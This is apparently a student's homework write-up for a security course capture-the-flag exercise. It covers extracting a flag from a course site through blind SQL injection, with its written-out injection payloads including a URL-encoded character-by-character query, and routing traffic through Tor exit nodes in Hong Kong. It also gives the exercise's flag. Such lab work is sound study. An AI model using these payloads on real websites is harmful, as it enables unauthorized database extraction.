Security Programming Homework 1-1

Get Flags

According to the first hint: “Try to capture as more flags as you can.”, I think we should use to Tor to visit the website. But for tests and simlicity, I decided to use Chrome extension which called “Hola”. It is a cute tool that help you surfing the Internet through VPNs.

Although “Hola” is convenient, we should use Tor for better anonimity, like atdog said.

SQL injection Tests

According to the second hint, I believe there are vulnerabilities about SQL injection in the website. So I tried to append following query strings, assume the base url is http://tor.atdog.tw/news/1

'
`
UNION SELECT 1
UNION SELECT 1,2
UNION SELECT 1,2,3
...

Failed. We only got “500 Internal Server Error” page all the time. Try another method

AND 1=1
AND 1=2

Something happened! The first url returned the article but the second did not. So I guess I can use this feature to identify something, e.g. flag.

The second hint told me that there is a flag in the “flags” table and its column name is called “flag”. Chances are there could be multiple rows in that table. I want to know how many rows are there in the “flags” table

AND EXISTS(SELECT 1 FROM flags LIMIT 0, 1)
AND EXISTS(SELECT 1 FROM flags LIMIT 1, 1)
AND EXISTS(SELECT 1 FROM flags LIMIT 2, 1)

Using the “limit” SQL command to limit the lines of returned row(s). We knew there are two rows in the “flags” table from the above tests. But which one is the real flag? According to my tests, the actual flag is the second one.

The meaning of “blind SQL injection” is that we can only get true or false as a result at one time. But how can we capture the flag? One of the approaches is to narrow down the number of candidates of a single character by asking the webpage “larger or smaller” question. After located the exact character, move on to the next character. Repeat this action, the flag will show up

AND EXISTS(SELECT 1 FROM flags WHERE ORD(SUBSTR((SELECT flag FROM flags LIMIT 1,1), 1)) <= 79)

Finally, our sophisticated query string which will be appended to the base url is

%20and%20exists(select%201%20from%20flags%20where%20ord(substr((select%20flag%20from%20flags%20limit%201,1),%201))%20%3C=%2079)

Using Tor

The hint told me that I should connect to the webpage with Hong Kong IP. To satisfy this restriction and to use python script doing this boring job for me, Tor must be setup.

First we need to install Tor via Homebrew brew install tor. After the installation was done, you will see the caveats shown on the terminal

To have launchd start tor at login:

$ ln -sfv /usr/local/opt/tor/\*.plist ~/Library/LaunchAgents

Then to load tor now:

$ launchctl load ~/Library/LaunchAgents/homebrew.mxcl.tor.plist

The default Tor configuration file is at /usr/local/etc/tor/torrc.sample. We just need to add two lines of configuration in ${HOME}/.torrc

StrictNodes 1
ExitNodes {hk}

Then all of our connections will exit from Hong Kong.

Writing Python Script

Environment

I use Python 2.7.8 to write the script, and import some modules for automatic login and using SOCKS proxy

$ pyenv virtualenv 2.7.8 secprog-2.7.8
$ pyenv local secprog-2.7.8
$ pip install mechanize PySocks

Key Points

  • Using python mechanize library to implement login action
  • Using python PySocks library to make all connections go through Tor network (SOCKS proxy)

Flag

The flag is SECPROC{Hey,D0n't_f0rg3t_g0_thr0ugh_an0nymity_n3tw0rk.}

References